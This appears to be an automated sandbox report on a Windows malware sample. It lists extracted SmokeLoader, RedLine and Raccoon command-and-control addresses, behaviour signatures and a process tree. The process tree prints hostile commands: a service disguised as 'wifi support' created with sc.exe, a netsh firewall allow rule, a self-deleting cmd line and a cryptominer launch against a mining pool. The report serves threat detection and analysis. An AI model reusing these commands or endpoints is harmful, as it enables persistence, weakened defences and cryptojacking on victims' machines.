Analysis

  • max time kernel
    79s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-09-2021 23:36

General

  • Target

    28351e9cfaca470a9f99b2455b3f1354.exe

  • Size

    134KB

  • MD5

    28351e9cfaca470a9f99b2455b3f1354

  • SHA1

    3546e2d0d5732538a0bb565d410f5ca1de9c3416

  • SHA256

    11b4633345982ace9d710465450941598b2f9289f0438c358fa79eb8eaf680c3

  • SHA512

    2314aa8caf12dd0a730106b3fd6663bf80f8cc798956aef55eeb238d640b11f7a4afafb8f87293df7b6ece96afd4dc9002dfeacb6ecdca5a2296ada2826f4897

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Denis

C2

45.147.197.123:31820

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

Bliss

C2

185.237.98.178:62607

Extracted

Family

redline

Botnet

karma

C2

94.103.9.133:39323

Signatures

  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Chinese Botnet Payload 1 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe
    "C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe
      "C:\Users\Admin\AppData\Local\Temp\28351e9cfaca470a9f99b2455b3f1354.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:888
  • C:\Users\Admin\AppData\Local\Temp\E3D3.exe
    C:\Users\Admin\AppData\Local\Temp\E3D3.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe
      "C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe"
      2⤵
      • Executes dropped EXE
      PID:3236
    • C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe
      "C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe"
      2⤵
      • Executes dropped EXE
      PID:2336
    • C:\Users\Admin\AppData\Local\Temp\fbf.exe
      "C:\Users\Admin\AppData\Local\Temp\fbf.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Enumerates connected drives
      • Checks processor information in registry
      • Suspicious use of SetWindowsHookEx
      PID:3756
  • C:\Users\Admin\AppData\Local\Temp\E8F4.exe
    C:\Users\Admin\AppData\Local\Temp\E8F4.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\waxngztk\
      2⤵
        PID:3772
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\auqwhrjp.exe" C:\Windows\SysWOW64\waxngztk\
        2⤵
          PID:2696
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create waxngztk binPath= "C:\Windows\SysWOW64\waxngztk\auqwhrjp.exe /d\"C:\Users\Admin\AppData\Local\Temp\E8F4.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2788
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description waxngztk "wifi internet conection"
            2⤵
              PID:3576
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start waxngztk
              2⤵
                PID:2444
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3700
              • C:\Users\Admin\AppData\Local\Temp\ED99.exe
                C:\Users\Admin\AppData\Local\Temp\ED99.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:3784
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED99.exe"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2448
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /T 10 /NOBREAK
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1452
              • C:\Users\Admin\AppData\Local\Temp\F134.exe
                C:\Users\Admin\AppData\Local\Temp\F134.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3984
              • C:\Users\Admin\AppData\Local\Temp\F6C3.exe
                C:\Users\Admin\AppData\Local\Temp\F6C3.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3008
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute facebook.com
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3904
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitter.com
                  2⤵
                    PID:4912
                • C:\Windows\SysWOW64\waxngztk\auqwhrjp.exe
                  C:\Windows\SysWOW64\waxngztk\auqwhrjp.exe /d"C:\Users\Admin\AppData\Local\Temp\E8F4.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3884
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious use of WriteProcessMemory
                    PID:3528
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                        PID:4128

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/664-114-0x00000000001D0000-0x00000000001D9000-memory.dmp

                    Filesize

                    36KB

                  • memory/888-115-0x0000000000400000-0x0000000000409000-memory.dmp

                    Filesize

                    36KB

                  • memory/2336-400-0x0000000004C12000-0x0000000004C13000-memory.dmp

                    Filesize

                    4KB

                  • memory/2336-410-0x0000000004C10000-0x0000000004C11000-memory.dmp

                    Filesize

                    4KB

                  • memory/2336-396-0x0000000002430000-0x0000000002453000-memory.dmp

                    Filesize

                    140KB

                  • memory/2336-398-0x00000000020F0000-0x0000000002127000-memory.dmp

                    Filesize

                    220KB

                  • memory/2336-405-0x00000000024A0000-0x00000000024C2000-memory.dmp

                    Filesize

                    136KB

                  • memory/2336-423-0x0000000004C13000-0x0000000004C14000-memory.dmp

                    Filesize

                    4KB

                  • memory/2336-420-0x0000000004C14000-0x0000000004C16000-memory.dmp

                    Filesize

                    8KB

                  • memory/2336-407-0x0000000000400000-0x00000000004CB000-memory.dmp

                    Filesize

                    812KB

                  • memory/2368-121-0x0000000000850000-0x0000000000851000-memory.dmp

                    Filesize

                    4KB

                  • memory/2716-132-0x00000000004B0000-0x000000000055E000-memory.dmp

                    Filesize

                    696KB

                  • memory/2716-137-0x0000000000400000-0x00000000004AD000-memory.dmp

                    Filesize

                    692KB

                  • memory/3008-155-0x000000001BF90000-0x000000001BF92000-memory.dmp

                    Filesize

                    8KB

                  • memory/3008-139-0x0000000000170000-0x0000000000171000-memory.dmp

                    Filesize

                    4KB

                  • memory/3024-117-0x00000000005D0000-0x00000000005E6000-memory.dmp

                    Filesize

                    88KB

                  • memory/3236-406-0x00000000005B0000-0x00000000005E0000-memory.dmp

                    Filesize

                    192KB

                  • memory/3236-397-0x00000000022E0000-0x00000000022FF000-memory.dmp

                    Filesize

                    124KB

                  • memory/3236-399-0x0000000004A72000-0x0000000004A73000-memory.dmp

                    Filesize

                    4KB

                  • memory/3236-424-0x0000000004A74000-0x0000000004A76000-memory.dmp

                    Filesize

                    8KB

                  • memory/3236-404-0x0000000004A00000-0x0000000004A1E000-memory.dmp

                    Filesize

                    120KB

                  • memory/3236-413-0x0000000004A70000-0x0000000004A71000-memory.dmp

                    Filesize

                    4KB

                  • memory/3236-417-0x0000000004A73000-0x0000000004A74000-memory.dmp

                    Filesize

                    4KB

                  • memory/3236-408-0x0000000000400000-0x00000000004C5000-memory.dmp

                    Filesize

                    788KB

                  • memory/3528-274-0x0000000002400000-0x0000000002415000-memory.dmp

                    Filesize

                    84KB

                  • memory/3756-415-0x0000000002030000-0x00000000020EC000-memory.dmp

                    Filesize

                    752KB

                  • memory/3756-436-0x0000000010000000-0x0000000010018000-memory.dmp

                    Filesize

                    96KB

                  • memory/3756-403-0x0000000000400000-0x00000000004C4000-memory.dmp

                    Filesize

                    784KB

                  • memory/3784-159-0x0000000000400000-0x00000000004F0000-memory.dmp

                    Filesize

                    960KB

                  • memory/3784-156-0x00000000021C0000-0x0000000002250000-memory.dmp

                    Filesize

                    576KB

                  • memory/3884-275-0x0000000000400000-0x00000000004AD000-memory.dmp

                    Filesize

                    692KB

                  • memory/3884-273-0x00000000004B0000-0x00000000005FA000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3904-593-0x000001BFEC1A0000-0x000001BFEC1A1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3904-168-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3904-157-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3904-726-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3904-153-0x000001BFEC1D0000-0x000001BFEC1D1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3904-637-0x000001BFEC180000-0x000001BFEC181000-memory.dmp

                    Filesize

                    4KB

                  • memory/3904-613-0x000001BFEC1A0000-0x000001BFEC1A1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3904-158-0x000001BFEA080000-0x000001BFEA1CA000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3904-149-0x000001BFEC020000-0x000001BFEC021000-memory.dmp

                    Filesize

                    4KB

                  • memory/3904-369-0x000001BFEC160000-0x000001BFEC161000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-384-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-373-0x00000000078B0000-0x00000000078B1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-182-0x00000000054C0000-0x00000000054C1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-163-0x0000000005480000-0x0000000005481000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-152-0x0000000005550000-0x0000000005551000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-379-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-148-0x0000000005420000-0x0000000005421000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-356-0x0000000006C80000-0x0000000006C81000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-362-0x0000000007380000-0x0000000007381000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-141-0x0000000005A30000-0x0000000005A31000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-167-0x0000000005420000-0x0000000005A26000-memory.dmp

                    Filesize

                    6.0MB

                  • memory/3984-133-0x0000000000C10000-0x0000000000C11000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-394-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3984-391-0x0000000006FB0000-0x0000000006FB1000-memory.dmp

                    Filesize

                    4KB

                  • memory/4128-687-0x0000000002490000-0x0000000002581000-memory.dmp

                    Filesize

                    964KB

                  • memory/4128-679-0x0000000002490000-0x0000000002581000-memory.dmp

                    Filesize

                    964KB

                  • memory/4912-777-0x00000218DA2E0000-0x00000218DA2E2000-memory.dmp

                    Filesize

                    8KB

                  • memory/4912-778-0x00000218DA2E6000-0x00000218DA2E8000-memory.dmp

                    Filesize

                    8KB

                  • memory/4912-779-0x00000218DA2E3000-0x00000218DA2E5000-memory.dmp

                    Filesize

                    8KB